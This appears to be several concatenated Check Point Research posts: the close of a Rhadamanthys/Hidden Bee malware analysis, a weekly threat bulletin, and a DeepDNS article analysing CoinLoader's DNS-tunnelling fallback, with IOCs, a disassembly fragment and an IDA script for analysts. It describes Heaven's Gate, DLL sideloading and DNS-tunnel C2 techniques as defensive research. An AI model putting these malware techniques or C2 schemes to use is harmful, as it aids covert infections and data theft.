Hidden Bee was known for using formats with very similar names of packages, such as !rbx, !rcx, and !rdx, and for exactly the same purposes.

Heaven’s Gate and loading 64-bit modules from 32-bit

The initial executable of Rhadamanthys, as well as of Hidden Bee, is 32-bit. However, the further modules may be 64-bit. That means the malware has to find a way to deploy them.

Loading 64-bit modules from a 32-bit process is not typically supported. Therefore, the executable needs to use a technique that is not officially documented but well known in malware development circles: Heaven’s Gate (more about this technique here).

Let’s have a look at how a 64-bit custom module is loaded in Rhadamanthys:

If the system is recognized as 64-bit, a new 64-bit module is loaded from the package. The module is fetched by name. Next, a memory for it is allocated, and it is copied there, section by section.

The assembly fragment illustrates how the Heaven’s Gate is implemented:

The malware pushes on the stack the value 0x33 and then the next line’s address. When the far return is called, the execution returns to the next address but prefixed with the segment 0x33, which causes the switch to the 64-bit mode. This means that all further instructions will now be interpreted as 64-bit. The loading of the custom module continues in 64-bit mode. As we can’t switch the code interpretation directly in IDA, let’s see how it looks in PE-bear:

The module, which is 64-bit, will continue its own loading.

Similar building blocks to load the 64-bit module from a 32-bit process can be found in Hidden Bee. In the below case, a shellcode shim.bin is first fetched from the virtual filesystem in the !rdx format. A shared section is created, where the malware enters the needed data. Note that inputting the checksums is analogous to the case from Rhadamanthys, shown in Figure 61.

Finally, the execution is switched to 64-bit mode via Heaven’s Gate, analogously to the previous case:

Conclusion

There are many parallels between Hidden Bee and Rhadamanthys which strongly hint that the recently released stealer isn’t brand new but instead is a continuation of the author’s earlier work. The consistency of the design also suggests that the development is continued by the same author/authors as Hidden Bee and not merely inspired by or based on an obtained code.

Considering how quickly Rhadamanthys is updated, it is clear that we are dealing with a highly professional actor that keeps innovating and constantly improving the product, as well as incorporating learned techniques and PoCs. We can expect that the custom formats used for the executables, as well as for the virtual filesystems, will continue to evolve.

Looking at the trends, we believe that Rhadamanthys is here to stay, so it is worth keeping up with the evolution of those formats, as converting them to PE makes the analysis process much easier and faster.

Our converters are available at:

• https://github.com/hasherezade/hidden_bee_tools/tree/master/bee_lvl2_converter

Check Point customers remain protected from the threats described in this research.

Check Point’s Threat Emulation provides comprehensive coverage of attack tactics, file types, and operating systems and has developed and deployed a signature to detect and protect customers against threats described in this research.

Check Point’s Harmony Endpoint provides comprehensive endpoint protection at the highest security level, crucial to avoid security breaches and data compromise. Behavioral Guard protections were developed and deployed to protect customers against threats described in this research.

TE/Harmony Endpoint protections:

• InfoStealer.Wins.Rhadamanthys.C/D

IOC/Analyzed samples

Reference material

Hidden Bee filesystems (containing referenced modules):

The modules embedded in the filesystems can be retrieved with the help of the decoder: https://github.com/hasherezade/hidden_bee_tools/tree/master/rdx_converter

Appendix

Other writeups on Rhadamanthys:

[1] “Rhadamanthys: The”Everything Bagel” Infostealer”: https://research.checkpoint.com/2023/rhadamanthys-the-everything-bagel-infostealer/

[2] Kaspersky found the link between HiddenBee and Rhadamanthys: https://twitter.com/kaspersky/status/1667018902549692416

[3] Kaspersky’s crimeware report referencing Rhadamanthys and its similarity to Hidden Bee: https://securelist.com/crimeware-report-uncommon-infection-methods-2/109522/

[4] ZScaler’s article mentioning the usage of the Hidden Bee formats: https://www.zscaler.com/blogs/security-research/technical-analysis-rhadamanthys-obfuscation-techniques

[5] “Dancing With Shellcodes: Analyzing Rhadamanthys Stealer” by Eli Salem: https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88

and more: https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Writeups on Hidden Bee:

[6] https://www.malwarebytes.com/blog/news/2018/07/hidden-bee-miner-delivered-via-improved-drive-by-download-toolkit

[7] https://www.malwarebytes.com/blog/news/2018/08/reversing-malware-in-a-custom-format-hidden-bee-elements

[8] https://www.malwarebytes.com/blog/news/2019/05/hidden-bee-lets-go-down-the-rabbit-hole

[9] https://www.malwarebytes.com/blog/news/2019/08/the-hidden-bee-infection-chain-part-1-the-stegano-pack

and more: https://malpedia.caad.fkie.fraunhofer.de/details/win.hiddenbee

The post From Hidden Bee to Rhadamanthys – The Evolution of Custom Executable Formats appeared first on Check Point Research.

For the latest discoveries in cyber research for the week of 28th August, please download our Threat_Intelligence Bulletin

TOP ATTACKS AND BREACHES

• An ongoing espionage campaign targeting dozens of organizations in Taiwan has been discovered. Researchers have attributed the activity to a Chinese APT group dubbed Flax Typhoon, which overlaps with Ethereal Panda. The threat group minimizes the use of custom malware, and instead uses legitimate tools found in victims’ operating systems to conduct its espionage operations.
• Pro-Russian hackers have disrupted train services in northwest Poland by gaining access to the railway’s designated frequencies. The hackers broadcasted the Russian national anthem, as well as a speech of the Russian president Putin during the attack.
• Dutch cloud and hosting giant Leaseweb has notified customers that it had been affected by a security breach. The company claimed to be working on restoring critical systems, after it was forced to disable them in response to the attack.
• French employment government agency Pôle emploi has disclosed a breach, with personal information of up to 10 million registered users having been leaked. The breach has reportedly occurred via a 3^rd party IT vendor Majorel, which had been affected by ransomware group Cl0p’s in the MOVEit campaign.

Check Point IPS blade, Harmony Endpoint and Threat Emulation provide protection against this threat (Progress MOVEit Transfer Multiple Vulnerabilities; Webshell.Win.Moveit, Ransomware.Win.Clop, Ransomware_Linux_Clop; Exploit.Wins.MOVEit)

• London area Metropolitan Police has declared a red alert after personal information including photos of all 47,000 of the police force’s personnel has been leaked in a breach of 3^rd party contractor. The Police fears the information will get to terrorist and criminal groups, and has said it may be forced to pull undercover officers from sensitive operations.
• Financial advising firm Kroll has announced that personal information related to the bankruptcy cases of crypto firms BlockFi, FTX and Genesis was exfiltrated by a threat actor. According to Kroll, the threat actor used a SIM swapping attack, where they convinced mobile provider T-Mobile to transfer a Kroll employee’s phone number to the attacker without the victim’s authorization.
• Ransomware group Black Cat has claimed responsibility for breaching Japanese watch manufacturer SEIKO. The group claims to have stolen files from the SEIKO’s network, and threatens to leak them if the ransom is not paid. The company has previously acknowledged the breach.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.Win.BlackCat)

VULNERABILITIES AND PATCHES

• IT Software company Ivanti has published a security advisory regarding vulnerability CVE-2023-38035 affecting its Ivanti (MobileIron) Sentry product. The vulnerability allows API authentication bypass, and is considered critical. While no patch has been released, Ivanti has posted RPM scripts to address it.

Check Point IPS blade provides protection against this threat (Ivanti MobileIron Sentry Authentication Bypass (CVE-2023-38035))

• Juniper Networks has updated last week’s security advisory regarding its firewall products. It has been discovered that the series of previously-reported medium-severity vulnerabilities (CVE-2023-36844 to CVE-2023-36847) can be used in conjunction to create a critical threat of unauthenticated remote code execution by a network attacker. Juniper has released updated versions to cover the vulnerabilities.
• Researchers warn of active exploitation of newly-discovered WinRAR zero-day vulnerability CVE-2023-38831. The vulnerability allows threat actors to deliver malware using benign WinRAR archive files, and has been used in a campaign targeting brokers and traders since April. WinRAR’s latest released version covers this vulnerability.

THREAT INTELLIGENCE REPORTS

• Check Point Research has published 2023’s mid-year security report which shows 8% increase in weekly cyber-attacks in the second quarter of the year. The report also reveals that in the first half of 2023, a total of 48 ransomware groups have publicly extorted more than 2,200 organizations worldwide.
• Check Point Research demonstrates the effectiveness of DeepDNS, Check Point’s novel artificial neural network that blocks DNS-related threats. Among others, the tool has successfully detected a new CoinLoader malware campaign, which employs a DNS backup channel.

Check Point IPS blade, Harmony Endpoint and Threat Emulation provide protection against this threat (APT.Wins.Coinloader)

• Check Point Research highlights that in comparison to other industries, the Education/Research sector experiences the highest rate of cyberattacks, with a vast disparity. In 2023, this sector has witnessed an average of 2256 weekly cyber-attacks per organization, while the APAC region recorded the highest rate of weekly cyberattacks per Education organization.
• Researchers have identified a novel geo-location malware dubbed Whiffy Recon. The malware is delivered via Smoke Loader, a common downloader vector used by threat actors to distribute additional payloads. Whiffy Recon continuously scans for nearby Wi-Fi networks, and then uses the legitimate Google Geolocation API to pinpoint the victim’s location as they travel.

Check Point Threat Emulation provides protection against this threat

The post 28th August – Threat Intelligence Report appeared first on Check Point Research.

Introduction

Generative AI has been around for nearly a decade, strictly speaking, but the recent boom in this technology has inspired renewed interest in its possible applications to challenges facing the information security community. Finding these challenges entails searching through a very large haystack consisting of brand-new binaries, documents, domains and other artifacts that flood the web every day.

In this blog post, we provide a deep dive into Check Point’s ongoing use of such a model to sweep across this haystack, and routinely thwart malicious campaigns abusing the DNS protocol to communicate with C&C servers. We focus on one such campaign, of CoinLoader, and lay out its infrastructure as well as an in-depth technical analysis of its DNS tunnelling functionality.

A Crash Course in DNS Tunneling

What is DNS?

Domain Name Server (DNS) protocol can be considered “the phonebook of the internet.” When you enter a website address (let’s say wikipedia.org) into your web browser’s address bar and press enter, your web browser sends a DNS request to its favorite DNS server, asking what IP addresses correspond to that domain. The IP address of this default DNS server is either supplied by the user’s network provider or specified manually by the user.

Under the hood, a typical DNS query rides on top of the UDP protocol (to jog your memory, whereas TCP deals with the issue of “did my peer really get that message?” using SYNs and ACKs, UDP deals with it using thoughts and prayers). A DNS packet, whether a query or a response, consists of a header and 4 main sections:

• Question or Query – For example, “What domain name? What kind of answer do you expect?”
• Response – An answer to the question.
• Authority – Information about the servers responsible for keeping track of the domain addresses.
• Additional – Miscellaneous data such as the IP addresses of the authoritative servers.

How does one “Tunnel” using DNS?

“DNS Tunneling” is the practice of abusing DNS, using it as a covert channel of communication such as between a malware and its C&C server. In this scenario, the malicious actor controls both the client and the server, giving them a lot of wiggle room with respect to what kind of query to make, and where to hide the “spicy” part of the response.

However, the scheme the actors choose is inherently subject to the limitations of the DNS protocol itself. For example:

• Request and response lengths are bounded. The entire domain that is being looked up must not exceed 255 bytes, and the maximum length of a DNS packet is 576 bytes.
• The DNS protocol naturally lends itself to caching. Servers make note of a response they sent an hour ago and when asked, simply repeat that response, instead of going all the way to the authoritative server and nagging “Hey, is that answer from an hour ago still valid?” This is great for legitimate users of DNS, but not so great for DNS tunneling clients, which typically resort to querying many fictitious subdomains (af34deb93557.maliciousdomain.xyz, then later 48bd9a577d114.maliciousdomain.xyz, and so on) to keep the queries fresh.

If this all sounds too theoretical, one well-known malware that utilizes DNS tunneling is the high-profile SUNBURST backdoor, which was delivered to unsuspecting victims as part of the infamous 2020 SolarWinds hack. SUNBURST used DNS queries as a light recon channel, covertly transferring victim information encrypted as an identifier, and then used it as a subdomain in a DNS query. This subdomain was prepended to one of the four main domains:

appsync-api.us-east-1[.]avsvmcloud[.]com
appsync-api.us-east-2[.]avsvmcloud[.]com
appsync-api.eu-west-1[.]avsvmcloud[.]com
appsync-api.us-west-2[.]avsvmcloud[.]com

For example, the resulting fictitious FQDN looks like this:
7cbtailjomqle1pjvr2d32i2voe60ce2[.]appsync-api[.]us-east-1[.]avsvmcloud[.]com.
Based on the information transferred over the DNS requests, the DNS server would return a CNAME record to targets of interest. The CNAME would point to a C&C server that communicates with the malware over HTTPS.

Analyzing DNS Tunnels

Can a determined defender, standing atop a network gateway, detect DNS tunneling? This is a surprisingly loaded question, because the definition of DNS tunneling is very broad, and some implementations are more difficult to detect than others. We list some points of interest below that are worth keeping in mind while analyzing activities suspected to be DNS tunneling.

We asked ourselves the following questions:

• How many? and How Long? Take a look at the number and length of sub-domains associated with a suspicious domain. As mentioned previously, DNS packets are limited in size, offering actors a small number of fields to manipulate. The most effective way to transfer data in DNS queries is using subdomains, which results in a high volume of DNS requests to multiple, often long, subdomains of the same domain. This also helps to avoid potential caching problems.

• Who’s answering? DNS is authoritative, meaning specific name-servers (NS) are responsible for the final resolution of specific domains. DNS queries for those domains do eventually end up reaching those servers (unless they are cached somewhere along the way). To facilitate DNS Tunneling, an actor must control the nameserver associated with a particular domain. A look at a suspicious domain’s NS record or WHOIS record, that indicates the authoritative nameserver for that domain, might actually point to the threat actors’ infrastructure.

Answering those questions may not be easy, but luckily for us as researchers, a lot of them can be answered using public resources. Passive DNS is a very helpful tool in triaging a wide variety of threats but is extremely efficient when dealing with DNS tunneling. As DNS tunneling relies on the DNS protocol itself, passive DNS replications often document artifacts transferred with it. In some cases, it might even be possible to extract information related to the victims themselves.

Introducing DeepDNS

As part of our ongoing interest in general DNS tunneling and malicious web traffic, this year we saw the introduction of DeepDNS, an artificial neural network that hunts and blocks campaigns that abuse DNS. DeepDNS is a Gated Recurrent Unit Autoencoder (GRU-AE) that is trained on the vast amount of DNS traffic routinely available to Check Point as part of the telemetry. The DeepDNS conclusions drawn are automatically pushed to Check Point ThreatCloud.

This document is certainly not a treatise on the inner workings of AI, but we still felt you would be well served by a very simplified explanation of what a “Gated Recurrent Unit Autoencoder” is, at least in broad strokes.

To begin with, an autoencoder is an artificial neural network, meaning, it is a virtual brain that begins its life as a blank slate. During its training phase, it is given an input — the output is then observed, and changes to the brain’s parameters that would make the output more desirable are determined using calculus, then applied (this is a fancy way of saying that you close your eyes, imagine that the wrongness of the output as a function of the brain parameters is a mountain, then go as quickly down the mountain as you can until you cannot go further down). This process repeats until the virtual brain’s actual output sufficiently resembles the desired output. If this whole description sounds alien to you, consider that it is not so conceptually different from what you do when you repeatedly shout “NO!! NO!! LEAVE THAT ALONE!!!” at your three-year-old.

Artificial neural networks have a surprising capacity to learn all sorts of functions (this is even theoretically proven). One such function is simply “map this text to some short representation (code), then change the code back to a text so that the final text resembles the initial text as much as possible.” A neural network that’s been trained to learn this kind of function is called an autoencoder. An autoencoder can function as a generative model: obtain a novel point in code space in some way (by picking at random or just mixing some known points together), and if the model has learned a good representation of the data, decoding this point will result in novel text. As this isn’t technically part of an autoencoder’s specification, the literature appears divided on how correct it is to refer to it as a generative model, as opposed to a model with generative capacity (have fun with this Google search); but “model with generative capacity” did not fit so neatly into the main title, so here we are.

One other use case for autoencoders, which is relevant here, is that of anomaly detection. Applying some mathematical intuition will lead you to the conclusion that “typical” input will be compressed and reconstructed by the autoencoder with relative success, whereas compression and reconstruction of “atypical” input is more likely to introduce errors. This is basically for the same reason that if I say “the quick brown fox jumps over the lazy dog” then five minutes later ask you to repeat that sentence, you will probably succeed, but the same is not true for “the abstruse purple platypus confounds the prolific cheetah”.

DeepDNS works on this same principle. Using deep inspection of subdomain names which are further broken down into smaller constituent parts, it uses the encode-decode process that it learned to render its judgment on the simple question, “how normal does this set of queries look?” If the reconstruction sufficiently fails, DeepDNS concludes that the answer is “not normal enough”, and delivers a malicious verdict. This approach is elegant in its simplicity, if you ignore the part where training the model involves colorful floating surfaces and a bunch of partial derivatives.

At the End of the Tunnel – Fishing Out and Drilling Down into CoinLoader DNS Tunneling

Now that we’ve covered the theory, it’s time to put it into practice. Knowing how DeepDNS works at the black box level (and even some of its inner workings thanks to the section above), it is natural to ask what it can find if we make it search for anomalies across our available telemetry. We did just that and ran DeepDNS on our sample. Among the many results that it flagged as anomalous, one previously unknown cluster of domains caught our eye in particular:

• rqmetrixsdn[.]info
• candatamsnsdn[.]info
• mapdatamsnsdn[.]info

A closer look at the infrastructure connected with these domains suggests they are part of a DNS backup channel used for CoinLoader infections.

Coinloader was first described in this extensive report by Avira, but we could not find prior documentation describing this specific feature. Samples were found in an archive, typically a rar or a zip, containing several files. While the names varied, what you see below is more or less representative of the file structure in each sample.

The executable (ZD_1.4.24.17 in the image) is always some legitimate tool which is used for DLL sideloading. The main malicious logic is in the sideloaded DLL (here AppleVersions.dll). Upon being loaded, it goes through several layers of unpacking, including a well-obfuscated check that its parent process was launched from inside the Z-1-36-81 directory (again, the directory name varies from sample to sample) that is buried inside some complex control flow structures.

Once unpacking is complete, the malicious logic is visible. This final stage still contains several anti-analysis features, such as junk code; encrypted stack strings that are decrypted on-the-fly using a simple substitution cipher; and indirect calls that are resolved using a homebrew function table, in which the register points at what is passed to each function in ecx. This is then copied to a random register each time, which is used to implement the calls.

While the junk code is best ignored and the obfuscated strings are best dealt with by dynamically executing the code and observing the decoder output, the resolution of the function calls in the IDA database requires a dedicated script. To see such a script, go to Appendix A.

The traffic capture generated by one such sample seemed promising:

So we set out to perform a technical analysis of this feature.
The function get_c2_domain receives an enum argument (here passed in the register edx). The values 0, 1, 2 and 3 cause the function to decrypt and return, respectively, each of the malware’s hardcoded C&C domain names — in this case rqmetrixa.info, rqmetrixb.info, rqmetrixc.info, rqmetrixd.info (we were honestly disappointed not to find some piece of logic appending a letter to rqmetrix but these were all hardcoded as-is).

Finally, if this enum value equals 4 (above annotated as GET_DOMAIN_DNS_TUNNEL_BACKUP), the malware resorts to a backup plan, and attempts to obtain a domain name by conferring with a different server, rqmetrixsdn.info, via the TXT DNS tunneling query as seen in the traffic capture.

The FQDN is created by taking one of the hardcoded domains and prepending to it hexlify(md5(timestamp)). In the image below we show it as a code block to filter out junk instructions.

mov     ebx, eax
mov     [ebp+md5_of_timestamp], ebx
call    [edi+FuncTable.GetSystemTime]

xor     eax, eax        
mov     [esi+0Eh], ax
push    ebx             ; allocated buffer
call    mre_get_filetime_md5 ; now has md5 of current timestamp

The timestamp md5 is obtained using SystemFileToFileTime (then converted into a timestamp using additional WinAPI functions). Once the server responds, its response is fed to an inline BASE64 decoder. The result is interpreted as a C&C domain to check in with, similar to the SUNBURST setup that we mentioned earlier. The check-in format, which is the output of the string_decoder deobfuscation handler, is visible below.

Conclusion

DNS tunneling is what you might call an “old-school” technique. It originated in a security landscape created by the advent of the first firewalls, and the drawing of simplistic boundaries: who initiated a connection? With whom? On what port? Using what protocol? Therefore allow, or deny. The industry has since greatly evolved and the benefits of DNS tunneling have become less clear-cut. DNS is no longer some “covert channel” where no security solution would think to look; and conversely, attackers have refined their understanding of how to effectively communicate using HTTP and hide in plain sight, using a variety of techniques such as steganography and encryption.

Still, DNS tunneling is clearly not dead. Whether because it less obviously jumps out at the human eye, or because malware authors simply figure the technique is worth a try if straightforward HTTP communication has failed — or for other reasons — modern malware is not shy to engage in this practice. As defenders, we are naturally interested in ways of catching it in the act. In this post, we explained how it is possible to model DNS tunnels as anomalies and hunt them from an unusual perspective, as demonstrated with DeepDNS. This hunt has led us to evidence of a number of actors currently using the technique, including state-sponsored cybercriminals and even hacktivists. As an example, we performed a technical analysis of a Coinlander sample and its tunneling protocol that DeepDNS sniffed out as anomalous. Other than its natural interest to us as threat hunters, this also served as a nice proof-of-concept for DeepDNS’s capabilities.

While academia carries the torch of pushing scientific boundaries and proving what is possible, it often falls to industry to implement academic ideas at scale, and usher them along the path from promising whitepaper to surviving impact with the messy real world. While we continuously work to apply ANNs to security at that level of maturity, the frontier is far from exhausted. With the recent surge of interest in ANNs and their applications, we can only expect more and more artificial brains to be making real-world security decisions, and it is our responsibility as an industry that they do so with skill and accountability.

So, in that spirit, let this article be a testament to that time when we said “Oh, model, you say that’s DNS tunneling? Let our analysts and reverse-engineers double-check you on that”.

Indicators of Compromise

CoinLoader Samples

a05144d7254b419d3a09787e280b4be3
84548cf16e26979ff9a3fa2b3f854f34

CoinLoader Infrastructure

candatamsnsdn[.]info
candatamsna[.]info
candatamsnb[.]info
candatamsnc[.]info
candatamsnd[.]info
mapdatamsnsdn[.]info
mapdatamsna[.]info
mapdatamsnb[.]info
mapdatamsnc[.]info
mapdatamsnd[.]info
rqmetrixsdn[.]info
rqmetrixa[.]info
rqmetrixb[.]info
rqmetrixc[.]info
rqmetrixd[.]info

Check Point Software Customers remain protected against the threat described in this research.

Check Point Threat Emulation and Harmony Endpoint provide comprehensive coverage of attack tactics and is protecting against the type of attacks and threats described in this report.

Check Point Harmony Endpoint:

APT.Win.Coinloader.B
APT.Win.Coinloader.C

Check Point Threat Emulation:

APT.Wins.Coinloader.A
APT.Wins.Coinloader.D

Appendix A — Python script for resolving indirectly called functions in the final stage of Coinloader

(Requires function table ripped from memory — sample function table included below.)

from abc import ABC, abstractmethod, abstractclassmethod
from typing import List, Tuple, NewType, Dict, Set, Callable, TypeVar, Any, cast, Optional
from functools import wraps
from enum import Enum
import sys

FuncT = TypeVar("FuncT", bound=Callable[...,Any])

try:
    import idc #type: ignore
    import idautils #type: ignore
    import ida_struct #type: ignore
    import ida_bytes #type: ignore
    import ida_idaapi #type: ignore

except ModuleNotFoundError:
    pass #ok, not running within IDA

#IDA
def ida(func: FuncT) -> FuncT:
    ida_modules = set(["idc","idaapi"])
    @wraps(func)
    def wrapper_ida_check(*args: Any, **kwargs: Any) -> Any:
        if not set(sys.modules).issuperset(ida_modules):
            print("ERROR: IDA function called outside IDA context!")
            raise NotImplementedError
        return func(*args, **kwargs)
    return cast(FuncT, wrapper_ida_check)

class OPERAND_TYPE(Enum):
    o_void = 0
    o_reg = 1
    o_mem = 2
    o_phrase = 3
    o_displ = 4
    o_imm = 5
    o_far = 6
    o_near = 7
    o_idpspec0 = 8
    o_idpspec1 = 9
    o_idpspec2 = 10
    o_idpspec3 = 11
    o_idpspec4 = 12
    o_idpspec5 = 13

Addr = NewType("Addr",int)

#Functable

class Functable(ABC):
    @abstractmethod
    def funcname_from_offset(self, addr: Addr) -> str:
        raise NotImplementedError

    @abstractmethod
    def as_dict(self) -> Dict[Addr, str]:
        raise NotImplementedError

    @ida
    @abstractmethod
    def ida_struct_id(self) -> int:
        raise NotImplementedError
    
    @abstractclassmethod
    def from_file(cls, fname: str) -> "Functable":
        raise NotImplementedError

class _Functable(Functable):
    def __init__(self, base: Addr, addr_contents: List[Tuple[Addr,str]]) -> None:
        self.base = base
        self.content_by_addr = {k: v for (k,v) in addr_contents}
        self.struct_id = None

    def funcname_from_offset(self, offset: int) -> str:
        return self.content_by_addr[Addr(self.base+offset)]

    def as_dict(self) -> Dict[Addr, str]:
        return self.content_by_addr

    @ida
    def ida_struct_id(self) -> int:
        if self.struct_id is None:
            self.struct_id = ida_struct.add_struc(ida_idaapi.BADADDR, "FuncTable", False)
            struct_ptr = ida_struct.get_struc(self.struct_id)
            for (addr, funcname) in sorted(self.as_dict().items(), key = lambda item: item[0]):
                ida_struct.add_struc_member(struct_ptr, funcname, addr-self.base, ida_bytes.dword_flag(), None, 4)
        return self.struct_id #type: ignore
    
    @classmethod
    def from_file(cls, fname: str) -> "_Functable":
        with open(fname, "r") as fh:
            tokenized_entrylist = [line.strip().split(" ") for line in fh.readlines()]
            base = Addr(int(tokenized_entrylist[0][0],16))
            addr_contents : List[Tuple[Addr,str]] = []
            for tokenized_entry in tokenized_entrylist:
                if len(tokenized_entry) > 2:
                    addr_contents.append((
                        Addr(int(tokenized_entry[0],16)), 
                        tokenized_entry[2].replace("!","_")
                    ))
            return _Functable(base, addr_contents)

#CoinLoaderFunction

class CoinLoaderFunction(ABC):
    
    @ida
    @abstractmethod
    def functable_register(self) -> Optional[str]:
        raise NotImplementedError

    @ida
    @abstractmethod
    def heads(self) -> List[Addr]:
        raise NotImplementedError

    @ida
    @abstractmethod
    def is_indirect_call(self, addr: Addr) -> bool:
        raise NotImplementedError

    @ida
    @abstractmethod
    def all_indirect_calls(self) -> Dict[Addr,int]:
        raise NotImplementedError
    
    @ida
    @abstractmethod
    def patch_single_indirect_call(self, ea: Addr, ft: Functable) -> None:
        raise NotImplementedError

    @ida
    @abstractmethod
    def patch_indirect_calls(self, ft: Functable) -> None:
        raise NotImplementedError

    @ida
    @abstractclassmethod
    def from_addr(cls, addr: Addr) -> "CoinLoaderFunction":
        raise NotImplementedError

class _CoinLoaderFunction(CoinLoaderFunction):
    @ida
    def __init__(self, addr: Addr) -> None:
        self.addr = addr
        self._functable_register = self.functable_register()

    @ida
    def heads(self) -> List[Addr]:
        return [insn for bound in idautils.Chunks(self.addr) for insn in idautils.Heads(*bound)]
    
    @ida
    def is_regload_insn(self, ea: Addr) -> bool:
        if idc.print_insn_mnem(ea) != "mov": return False
        for i in (0,1):
            if OPERAND_TYPE(idc.get_operand_type(ea,i)) != OPERAND_TYPE.o_reg:
                return False
        if idc.print_operand(ea,1) != "ecx": return False
        return True

    @ida
    def functable_register(self) -> Optional[str]:
        try:
            regload_insn = next(filter(self.is_regload_insn, self.heads()))
            return idc.print_operand(regload_insn,0) #type: ignore
        except StopIteration:
            return None

    @ida
    def is_indirect_call(self, ea: Addr) -> bool:
        if self._functable_register is None: return False
        if idc.print_insn_mnem(ea) != "call": return False
        if OPERAND_TYPE(idc.get_operand_type(ea,0)) != OPERAND_TYPE.o_displ: return False
        if not idc.print_operand(ea,0).startswith("dword ptr ["+self._functable_register+"+"): return False
        return True

    @ida
    def all_indirect_calls(self) -> Dict[Addr,int]:
        eas = [h for h in self.heads() if self.is_indirect_call(h)]
        return {ea:idc.get_operand_value(ea,0) for ea in eas}

    @ida
    def patch_single_indirect_call(self, ea: Addr, ft: Functable) -> None:
        sid =  ft.ida_struct_id() 
        if sid is None:
            print("Cannot patch, functable doesn't have IDA struct")
            print("Use: functable.create_struct()")
        idc.op_stroff(ea, 0, sid,0)

    @ida
    def patch_indirect_calls(self, ft: Functable) -> None:
        for call in self.all_indirect_calls():
            self.patch_single_indirect_call(call,ft)

    @ida
    @classmethod
    def from_addr(cls, addr: Addr) -> "CoinLoaderFunction":
        return _CoinLoaderFunction(addr)

def patch_indirect_calls_all_functions(ft: Functable):
    for ea in idautils.Functions():
        clf : CoinLoaderFunction = _CoinLoaderFunction(ea)
        clf.patch_indirect_calls(ft)

def test_get_name() -> None:
    f = _Functable.from_file("functable.txt")
    assert(f.funcname_from_offset(0x0) == "kernel32_OpenProcess")
    assert(f.funcname_from_offset(0x4) == "kernel32_VirtualProtect")

Sample function table:

0x26cfb94 0x7dd71986 OpenProcess
0x26cfb98 0x7dd7435f VirtualProtect
0x26cfb9c 0x7dd711c0 GetLastError_0
0x26cfba0 0x7dd74913 LoadLibraryExA
0x26cfba4 0x7dd8e4be GlobalReAlloc
0x26cfba8 0x7dd7588e GlobalAlloc
0x26cfbac 0x7dd734d5 CreateThread
0x26cfbb0 0x7dd8d16f GlobalSize
0x26cfbb4 0x7dd7492b LoadLibraryW_0
0x26cfbb8 0x7dd71856 VirtualAlloc
0x26cfbbc 0x7dd71072 CreateProcessA
0x26cfbc0 0x7dd7495d LoadLibraryExW
0x26cfbc4 0x7dd77a10 ExitProcess
0x26cfbc8 0x7dd732bb SetThreadPriority
0x26cfbcc 0x7dd7186e VirtualFree
0x26cfbd0 0x7dd7168c LocalAlloc_0
0x26cfbd4 0x7dd734c8 FreeLibrary_0
0x26cfbd8 0x7dd75558 GlobalFree
0x26cfbdc 0x7dd72d3c LocalFree
0x26cfbe0 0x7ddeaeee SetFileCompletionNotificationModes
0x26cfbe4 0x7dd8cf28 SetPriorityClass
0x26cfbe8 0x7dd93102 lstrcpyW
0x26cfbec 0x7dd75971 FindResourceW
0x26cfbf0 0x7dd8ecbb SetFileTime
0x26cfbf4 0x7dd71809 GetCurrentProcess_0
0x26cfbf8 0x7dd7e2ce FindFirstFileA
0x26cfbfc 0x7dd8e9bb FindResourceA
0x26cfc00 0x7dd734b0 GetModuleHandleW
0x26cfc04 0x7dd741f0 QueryPerformanceFrequency
0x26cfc08 0x7dd9d53e FindNextFileA
0x26cfc0c 0x7dd75444 DeleteFileA
0x26cfc10 0x7dd9cb05 RegisterWaitForSingleObject
0x26cfc14 0x7ddf453f SetNamedPipeHandleState
0x26cfc18 0x7dd9691f K32EnumProcesses
0x26cfc1c 0x7dd8d3ab ReleaseSemaphore
0x26cfc20 0x7dd75a4b lstrlen
0x26cfc24 0x7df720c0 
0x26cfc28 0x7dd8192a lstrcpyn
0x26cfc2c 0x7dd997aa GetSystemWindowsDirectoryA
0x26cfc30 0x7ddf1807 CreateNamedPipeA
0x26cfc34 0x7dd743ef ResumeThread
0x26cfc38 0x7dd75ac9 SizeofResource
0x26cfc3c 0x7dd749ca GetSystemInfo
0x26cfc40 0x7dd71282 WriteFile
0x26cfc44 0x7dd73f5c CreateFileW
0x26cfc48 0x7dd75959 LockResource
0x26cfc4c 0x7dd7170d WideCharToMultiByte_0
0x26cfc50 0x7dd716c5 SetEvent
0x26cfc54 0x7ddf498e QueryFullProcessImageNameA
0x26cfc58 0x7dd71725 QueryPerformanceCounter_0
0x26cfc5c 0x7dd905a0 SetThreadAffinityMask
0x26cfc60 0x7ddf44bf RemoveDirectoryA
0x26cfc64 0x7dd8ca5a CreateSemaphoreW
0x26cfc68 0x7dd717ec GetCurrentThread
0x26cfc6c 0x7dd74f2b FlsAlloc
0x26cfc70 0x7dd7183e CreateEventW
0x26cfc74 0x7dd751a1 GetCommandLineA
0x26cfc78 0x7dd8b6e0 GetComputerNameA
0x26cfc7c 0x7dd75611 GetCurrentDirectoryW
0x26cfc80 0x7dd8eceb lstrcmp
0x26cfc84 0x7dd92a9d lstrcpy
0x26cfc88 0x7dd74208 FlsSetValue
0x26cfc8c 0x7ddfe6ab UnregisterWait
0x26cfc90 0x7dd71245 GetModuleHandleA
0x26cfc94 0x7dd9276c GetTempPathA
0x26cfc98 0x7dd8ecd3 SetFileAttributesA
0x26cfc9c 0x7dd7195e IsWow64Process
0x26cfca0 0x7dd7469b FlushFileBuffers
0x26cfca4 0x7dd75a7e SystemTimeToFileTime
0x26cfca8 0x7dde3161 EnumResourceNamesW
0x26cfcac 0x7dd8d650 Wow64DisableWow64FsRedirection
0x26cfcb0 0x7ddf40fb ConnectNamedPipe
0x26cfcb4 0x7dd71b00 SetErrorMode
0x26cfcb8 0x7dd8eef2 CreateIoCompletionPort
0x26cfcbc 0x7dd75aa6 GetLocalTime
0x26cfcc0 0x7dd74c6b CreateMutexA
0x26cfcc4 0x7dd7192e MultiByteToWideChar_0
0x26cfcc8 0x7dd7594c LoadResource
0x26cfccc 0x7dd74950 GetModuleFileNameW_0
0x26cfcd0 0x7dd8d3c3 GetQueuedCompletionStatus
0x26cfcd4 0x7dd71410 CloseHandle_0
0x26cfcd8 0x7dd7359f FlsFree
0x26cfcdc 0x7dd8195c SetHandleInformation
0x26cfce0 0x7dd710ff Sleep_0
0x26cfce4 0x7dd714b1 GetModuleFileNameA
0x26cfce8 0x7dd8d668 Wow64RevertWow64FsRedirection
